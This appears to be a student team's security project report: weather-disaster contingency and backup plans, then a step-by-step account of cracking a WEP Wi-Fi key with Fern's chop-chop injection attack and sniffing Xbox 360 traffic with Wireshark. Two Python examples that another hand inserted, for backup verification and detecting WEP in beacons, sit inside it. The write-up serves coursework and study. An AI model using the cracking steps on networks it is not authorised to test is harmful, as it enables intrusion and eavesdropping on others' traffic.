dispersal problems that State College experiences. As recently as June of last year, heavy rains left
several feet of water pooled on some major roads and caused serious water damage to low lying
buildings. Floods could pose a serious threat to the project – flooding may physically destroy
essential devices and data, cut off utilities, pose a threat to the well-being of team members, and
require long term recovery based on extensive damages.
Flooding and flash flooding risks can best be addressed similarly to other severe
weather. Team members should vigilantly monitor current weather threats and act accordingly.
Critical devices like computers or Xbox consoles should be stored in safe and dry locations that
are well above ground during the threat of flooding and unplugged to ensure that any damage to
surrounding utilities would not affect the device. Team members should also be aware of any threat
to their own safety and seek shelter in appropriate buildings if they are concerned about severe
weather conditions. Due to the difficulties associated with determining the depth or possible
damage caused by flood waters, team members are encouraged to avoid traveling during the
immediate emergency. In the event of prolonged power or utility outages, team members should,
if possible, attempt to locate businesses or residences that were not affected by the disaster and
offer free internet connections to continue project development.
Hurricanes
Pennsylvania and the Centre County region are at relatively low risk for the devastating
impact of full-force hurricanes, but the area has still been affected by the winds and substantial
rainfall that can occur when a tropical storm marches inland. Hurricanes have produced as much
as nineteen inches of rain water in eastern Pennsylvania and their high winds have been
associated with at least seven deaths in the past fifteen years. Due to their overall weakened
nature and most common attributes – high wind, substantial rainfall, and hail – team members
should generally regard tropical storms and hurricanes as powerful thunderstorms from a disaster
management perspective.
Hurricanes and their associated threats can best be addressed similarly to other severe
weather such as flooding or thunderstorms. Team members are expected to monitor current
weather threats and act accordingly. Critical devices like computers or Xbox consoles should be
stored in safe and dry locations that are well above ground during the threat of flooding and
unplugged to ensure that any damage to surrounding utilities would not affect the device, as might
happen with lightning from the storm front. Team members should also be aware of any threat to
their own safety and seek shelter in appropriate buildings if they are concerned about severe
weather conditions. In the event of prolonged power or utility outages, team members should, if
possible, attempt to locate businesses or residences that were not affected by the disaster and
offer free internet connections to continue project development.
Snow and Ice
The Centre County region experiences a substantial amount of severe winter weather
ranging from ice and sleet storms to powerful blizzards. The freezing precipitation can create
hazardous road conditions, down power lines, and create major schedule disruptions. Due to the
timeframe of the team’s project, however, the risk of these affecting our progress is remarkably
low. At the present time, AccuWeather suggests that there will be no freezing rain or snow within the
next several months.
In the event that snow does occur, team members should be cautious and allow extra time
for travel to classes or meetings. Snow poses little risk to the critical technology involved in the
project, though it could potentially lead to downed power lines or utilities. As with other threats,
in the event of prolonged power or utility outages, team members should, if possible, attempt to
locate businesses or residences that were not affected by the disaster and offer free internet
connections to continue project development. Campus computer labs are also generally
unaffected by frozen precipitation and may serve as a viable meeting place or alternative
workstation.
Earthquakes
Pennsylvania is not located along a major fault line and Centre County itself lies between
the very slight to slight risk categories for earthquake hazard zones. Although Penn State’s
University Park campus has experienced at least one felt tremor in the past five years, the
earthquake was not of substantial enough magnitude and was at great enough of a distance that it
did not pose any threat. More substantial earthquakes could cause significant destruction by
destroying underground and aboveground utilities, damaging or destroying buildings, and posing
a serious threat to team members.
In the event of a minor earthquake, team members are encouraged to avoid panicking and
move to a safe location. In the unlikely event of a major earthquake, team members should place
priority on personal safety and only focus on recovering key equipment after it is deemed safe by
proper authorities. As with other major disasters, it is likely that utilities may be disrupted for a
substantial period of time. If possible, team members should seek out businesses, known
residences, or campus workstations that have power and internet access.
Maintaining Uptime
As outlined in the potential threats and scenarios above, there are many commonalities in
maintaining reasonable uptime and recovering from serious disasters. First, key devices and
technology should be stored in a physically secure location that is locked or under direct
observation if it cannot be locked. Due to the overwhelming number of natural threats, this
location is ideally above ground, dry, and structurally stable. Similar cautions should be utilized
when devices are in use for the team project, as should reasonable measures of physical security.
To ensure data and team progress is not lost, team members should adhere to the backup
plan outlined below, as well as ensuring all team related work is shared to group members, saved
to multiple physical locations (such as multiple hard drives, flash drives, personal and university
computers), and uploaded to the cloud storage service Google Drive. By following all of these
steps, the team can manage the catastrophic loss of one or more devices or copies of data without
actually losing progress on the project.
In the event of major utilities being down for an extended period of time, team members
should familiarize themselves with the many businesses and computer labs in the area that offer
free internet or computer access. The University Park campus itself is obviously a tremendous
resource, as it offers a central location that rarely loses power or internet access that could be
utilized for both team meetings and workstations in the event of a disaster. While they cannot be
used to compensate for equipment loss, many fast food restaurants and cafes offer free internet
connections and power outlets that can be utilized to perform some less technical aspects of the
project. Finally, known residences of family and friends outside of a specific disaster’s radius
can be employed by team members for both utilities and workstations, as well as a safe place to
conduct the more sensitive aspects of the project involving breaking wireless encryption.
Critical System: Xbox Console
  Threats: Xbox Live downtime, physical theft, environmental threats, device failure
  Response Strategy: Determine nature of problem, confirm device is not functional, troubleshoot device
  Recovery Strategy: Utilize alternate device while recovering primary if necessary; alter project scope if alternate is unavailable/unworkable

Critical System: Team Computers
  Threats: Theft, environmental threats, device failure
  Response Strategy: Ensure device is inoperable, confirm data was saved/stored elsewhere, troubleshoot device
  Recovery Strategy: Shift data/assignment to other members while device is recovered; utilize alternative workstation if device cannot be fixed in a timely manner

Critical System: Team Data
  Threats: Theft, environmental threats, device failure
  Response Strategy: Verify data was saved/stored, switch to alternative storage location/medium/device, adhere to backup plan, determine nature of data threat
  Recovery Strategy: Fix data issue/device, continue to adhere to backup plan

Critical System: Utilities
  Threats: Environmental threats
  Response Strategy: Locate alternative work sites or stations, alert team of viable locations
  Recovery Strategy: Return to normal devices/workstations and sites, ensure proper backup plan adherence
Backup Plan
At a glance:
Type: Full Backup
Frequency: One per meeting, week, or deadline – whichever occurs first
Hardware: Team members’ personal computers, flash drives, and university machines
Storage Location: Onsite and Offsite. Onsite – Personal devices. Offsite – University machines
and cloud storage.
Details
In order to ensure a smooth recovery from any possible disaster or setback, Team
Clockwork has elected to employ a full backup strategy. As a result, the team will ensure that
each member backs up all of the data, documents, and major software involved in the project to
ensure straightforward recovery. In line with a good backup plan, this means that we will not
only be backing up our essential documents and files associated with the project, but also
maintaining multiple operable copies of the Kali Linux distribution that we have elected to use
and maintaining complete records of team communications. The latter task is accomplished
through the GroupMe application, which allows our communications and profiles to be stored
locally and remotely. This step, while possibly unnecessary, was largely inspired by some of the
requirements of SOX.
Everyone within the team will be responsible for backups – as a result, data and software
will be almost impossible to lose and all team members will constantly be updated and aware of
the project’s current status and deadlines. This decentralized approach works well with the nature
of a less-formal group project and carries the secondary purpose of ensuring every member is
actively engaged in the assignment.
Full backups should be conducted every week, every major project deadline, or after
every team meeting, whichever occurs more frequently. A variable frequency dependent
primarily on important events offers the most reliable option to ensure that all data and software
is properly backed up after important changes are made or milestones are reached.
As a team, we have elected to use both onsite and offsite storage methods to ensure
effective and resilient backups. In terms of onsite storage, we are utilizing our devices and flash
drives as a means of individual, local backups. For offsite backups, university machines and
cloud storage via Google Drive meet our team’s needs as well as facilitating team collaboration
efforts.
Overall, our backup plan ensures a simple but effective means of complete recovery from
nearly any disaster. By requiring that everything be backed up by everyone, we have not created an
unnecessary burden due to the limited scope of the project, but do ensure that everyone is
involved and engaged. Similarly, requiring these backups be done dependent on periods of
productivity or within a certain time frame ensures that important progress will always be
recoverable. Finally, the overall strength of our plan is only reinforced by requiring the backups
be done on two physical devices onsite as well as two off site, remotely accessible locations.
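The full-backup-to-two-locations scheme described above, as an added example that is not code from the Team Clockwork report: a Python script that copies a project tree to an onsite and an offsite destination and stores a SHA-256 manifest beside each copy, so that a backup can later be verified without access to the original source. Verification is the step the plan presupposes but never spells out; a copy nobody has checked is not a backup. The directory names, file contents and snapshot label below are constructed for the example.

```python
"""Full backup to two locations with a SHA-256 manifest for later verification."""
import hashlib
import json
import shutil
import tempfile
from pathlib import Path


def build_manifest(src: Path) -> dict:
    """Map each file under src (relative path) to the SHA-256 digest of its contents."""
    files = sorted(p for p in src.rglob("*") if p.is_file())
    return {p.relative_to(src).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in files}


def full_backup(src: Path, destinations: list, label: str) -> dict:
    """Copy the whole tree to every destination (e.g. onsite flash drive, offsite drive).

    A full backup replaces any earlier snapshot carrying the same label, and the
    manifest is stored next to the copy so it can be verified without the source.
    """
    manifest = build_manifest(src)
    for dest in destinations:
        snapshot = Path(dest) / label
        if snapshot.exists():
            shutil.rmtree(snapshot)
        shutil.copytree(src, snapshot)
        (snapshot / "MANIFEST.json").write_text(json.dumps(manifest, indent=1))
    return manifest


def verify_backup(snapshot: Path) -> list:
    """List files that are missing or whose contents no longer match the stored manifest."""
    manifest = json.loads((snapshot / "MANIFEST.json").read_text())
    problems = []
    for rel, digest in manifest.items():
        copy = snapshot / rel
        if not copy.is_file():
            problems.append(f"missing: {rel}")
        elif hashlib.sha256(copy.read_bytes()).hexdigest() != digest:
            problems.append(f"modified: {rel}")
    return problems


def demo(root: Path = None) -> dict:
    """Build a constructed project tree, back it up twice, damage one copy, verify both."""
    cleanup = root is None
    if cleanup:
        root = Path(tempfile.mkdtemp())
    try:
        src = root / "project"
        (src / "captures").mkdir(parents=True)
        (src / "notes.txt").write_text("WEP lab notes (constructed sample)\n")
        (src / "captures" / "xbox.pcapng").write_bytes(b"\x0a\x0d\x0d\x0a" + b"sample" * 100)
        onsite, offsite = root / "onsite_flash", root / "offsite_drive"
        label = "snapshot-week-09"  # constructed label; the plan ties it to a meeting or deadline
        full_backup(src, [onsite, offsite], label)
        # Simulate bit rot or tampering on the onsite copy only.
        (onsite / label / "notes.txt").write_text("altered\n")
        return {"onsite": verify_backup(onsite / label),
                "offsite": verify_backup(offsite / label)}
    finally:
        if cleanup:
            shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())  # expected: onsite flags notes.txt as modified, offsite is clean
```

Run `demo()` to see both outcomes at once: the untouched offsite copy verifies clean, while the onsite copy reports the altered file. In practice the manifest itself should also be kept in a second place (the cloud copy the plan already calls for), since an attacker or a failing drive that corrupts the data can corrupt a manifest sitting beside it just as easily.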
Technical Implementation
Installation of Kali Linux
In order to allow the use of Kali Linux without installing it on the hard drive, we used
Linux Live to create a bootable live drive to be able to run the operating system off the flash
drive. After the live drive was made, we had to change the BIOS settings of the computer we
intended to run it on. The boot priority was edited to allow the flash drive with Kali Linux to
boot when the flash drive was inserted into the computer and restarted. Once the flash drive
loaded the Kali Linux distribution, we selected Run AMD 64, which would boot Kali Linux
without installing. After a few minutes the GUI loaded and the operating system was live and
ready for use.
Cracking into the Target Wi-Fi
After analysis of the target network, we determined that the network was using WEP
encryption. Once we had determined the type of encryption the network was utilizing, we began
researching WEP cracking methods. The most practical method of cracking the Wi-Fi and
gaining access to the network would be through a program called Fern, a Python-based cracking
program.
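How the encryption type is read off the air, as an added example that is not part of the Team Clockwork report: an access point advertises its security in every beacon frame, through the Privacy bit of the Capability Information field and the presence or absence of an RSN (WPA2) or vendor WPA information element. Wireshark and the Aircrack-ng tools display exactly this as the network's encryption type, and it is the same evidence a network owner uses to inventory access points that are still running WEP and should be migrated. The parser below is a minimal Python stand-in for that check; the beacon frames, SSIDs and BSSIDs are constructed for the example and are not captured traffic. It covers the outcomes the report does not spell out (open, WPA, WPA2) as well as a truncated element.

```python
"""Read the security type off 802.11 beacon frames and flag networks still on WEP."""
import struct

MGMT_HDR_LEN = 24       # Frame Control(2) + Duration(2) + 3 x Address(6) + Sequence Control(2)
FIXED_PARAMS_LEN = 12   # Timestamp(8) + Beacon Interval(2) + Capability Information(2)
CAP_ESS = 0x0001        # Capability bit 0: infrastructure (ESS) network
CAP_PRIVACY = 0x0010    # Capability bit 4: Privacy, set for WEP, WPA and WPA2 alike
IE_SSID = 0
IE_RSN = 48             # RSN information element (WPA2)
IE_VENDOR = 221         # Vendor-specific element; WPA1 uses OUI 00:50:F2, type 1
WPA_OUI_TYPE = b"\x00\x50\xf2\x01"


def parse_ies(body: bytes) -> dict:
    """Walk the tagged elements (tag, length, value) that follow the fixed fields."""
    ies = {"vendor": []}
    i = 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:
            break  # truncated element: stop instead of mis-parsing the tail
        if tag == IE_VENDOR:
            ies["vendor"].append(value)
        else:
            ies[tag] = value
        i += 2 + length
    return ies


def classify_beacon(frame: bytes) -> dict:
    """Return SSID, BSSID and advertised security (OPEN, WEP, WPA or WPA2/RSN)."""
    if len(frame) < MGMT_HDR_LEN + FIXED_PARAMS_LEN:
        raise ValueError("frame too short to be a beacon")
    if (frame[0] & 0xFC) != 0x80:   # type 0 (management), subtype 8 (beacon)
        raise ValueError("not a beacon frame")
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])           # Address 3 = BSSID
    capability = struct.unpack_from("<H", frame, MGMT_HDR_LEN + 10)[0]
    ies = parse_ies(frame[MGMT_HDR_LEN + FIXED_PARAMS_LEN:])
    ssid = ies.get(IE_SSID, b"").decode("utf-8", errors="replace")
    if not (capability & CAP_PRIVACY):
        security = "OPEN"
    elif IE_RSN in ies:
        security = "WPA2/RSN"
    elif any(v.startswith(WPA_OUI_TYPE) for v in ies["vendor"]):
        security = "WPA"
    else:
        security = "WEP"   # Privacy bit set but no RSN/WPA element: legacy WEP
    return {"ssid": ssid, "bssid": bssid, "security": security}


def find_wep_networks(frames) -> list:
    """(ssid, bssid) of every beacon that advertises WEP: the networks to migrate first."""
    results = (classify_beacon(f) for f in frames)
    return [(r["ssid"], r["bssid"]) for r in results if r["security"] == "WEP"]


def build_beacon(bssid: bytes, ssid: bytes, privacy: bool, extra_ies: bytes = b"") -> bytes:
    """Construct a beacon frame for this example; not a captured frame."""
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    capability = CAP_ESS | (CAP_PRIVACY if privacy else 0)
    fixed = struct.pack("<QHH", 0, 100, capability)   # timestamp, 100 TU interval, capability
    return header + fixed + bytes([IE_SSID, len(ssid)]) + ssid + extra_ies


# Minimal RSN element: version 1, group CCMP, one pairwise CCMP, one PSK AKM, no capabilities
RSN_IE = (bytes([IE_RSN, 20]) + b"\x01\x00" + b"\x00\x0f\xac\x04" + b"\x01\x00"
          + b"\x00\x0f\xac\x04" + b"\x01\x00" + b"\x00\x0f\xac\x02" + b"\x00\x00")
# WPA1 element cut down to its OUI/type header; real ones carry cipher suites too
WPA_IE = bytes([IE_VENDOR, 4]) + WPA_OUI_TYPE

# Constructed sample: invented SSIDs and locally administered BSSIDs
SAMPLE_BEACONS = [
    build_beacon(b"\x02\x00\x00\x00\x00\x01", b"clockwork-lab", privacy=True),
    build_beacon(b"\x02\x00\x00\x00\x00\x02", b"home-wpa2", privacy=True, extra_ies=RSN_IE),
    build_beacon(b"\x02\x00\x00\x00\x00\x03", b"legacy-wpa", privacy=True, extra_ies=WPA_IE),
    build_beacon(b"\x02\x00\x00\x00\x00\x04", b"coffee-open", privacy=False),
]

if __name__ == "__main__":
    for frame in SAMPLE_BEACONS:
        print(classify_beacon(frame))
    print("still on WEP:", find_wep_networks(SAMPLE_BEACONS))
```

The decision order matters: the Privacy bit alone cannot distinguish WEP from WPA/WPA2, so the parser only reports WEP when the bit is set and neither an RSN nor a WPA element is present. That is the case this report's target network fell into, and it is the condition a periodic wireless audit should alert on.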
The wireless card was put into monitor mode from the command console, and the Wi-Fi
cracking program Fern was then launched. Once the program was launched we began scanning for
the target network; once the network was found we instructed the program to attack the target
network. Before the attack commenced, the option to automate the attack was checked, which also
enabled the program to initialize packet injection into the target network to speed up the process
of cracking.
After 3-4 minutes the cracking was successful and the network key was displayed. The
network key was confirmed, and was used to gain access to the network. Once access to the
network was obtained, we launched the program Wireshark to begin packet sniffing. Wireshark
was set to sniff packets on the target network we gained access to, after 5-10 minutes of sniffing,
we ended the capture. After analysis of the packets we determined that we were able to capture
Microsoft certificates from the Xbox 360 used to authenticate users. We also captured packets
with URLs attached to them that enabled us to download images and other GUI components
directly from our web browser on a computer. Another interesting catch was the IGMPv2
protocol, which is used for multicast group management; this indicates it goes hand in hand with
the account subscription verification of an Xbox Live Account.
Appendix of Detailed Setup Instructions
1. Downloaded the penetration testing operating system, Kali Linux
2. Once image file was downloaded, we proceeded to use Linux Live to write the image to a
flash drive to make the drive bootable
3. After the drive was finished, we configured the attacking laptop’s BIOS settings to boot
from the flash drive
4. When the BIOS was configured, we plugged in our flash drive and booted into Kali
Linux
5. In the Kali Linux menu we chose AMD 64 graphic, which boots a GUI for Kali Linux
6. Once we were in the Kali Linux GUI, we proceeded to open up FERN
7. With network monitor mode enabled, we began scanning for the target network
8. Once the network was found we selected the target network, enabled “automate attack”
and selected “chop-chop attack” from the packet injection drop-down menu, and began
the attack
9. After 5 minutes the attack was successful and displayed the network key
10. The key was used to gain access to the network; once in, we opened up Wireshark
11. Before we began the capture, we bridged the connection from the Xbox 360 to the
attacking laptop
12. In Kali Linux we modified the network connection to allow sharing of internet to other
devices
13. After booting up the Xbox 360, we began capturing on eth0 (Ethernet port)
14. While capturing we signed into an Xbox Live account and navigated through the menus
and applications
15. After 10 minutes of capturing we ended the capture and began analysis of the packets
16. After analysis of the packets we found packets pulling media data that included a partial URL
17. We copied the URL, added “download.xbox.com” at the beginning of the URL, and copied
it into a browser
18. After a couple seconds the browser loaded the image that was displayed on the Xbox 360
GUI
Appendix of Problems
Problem One: Too much data on the network.
Fix: Reduce overall traffic and bridge console’s network connection via laptop.
Problem Two: Fern malfunction.
Fix: Change packet injection to the chop-chop method and increase overall traffic on the network.
Problem Three: Nature of Kerberos Tokens.
Fix: They are not sent from Xbox Live to console but rather between consoles in peer-to-peer
connections.
Problem Four: Unable to discover networks in Kali Linux.
Fix: Enable monitor mode on network card.
Problem Five: Lack of Xbox Traffic.
Fix: Sign in to Xbox Live after Wireshark capture starts.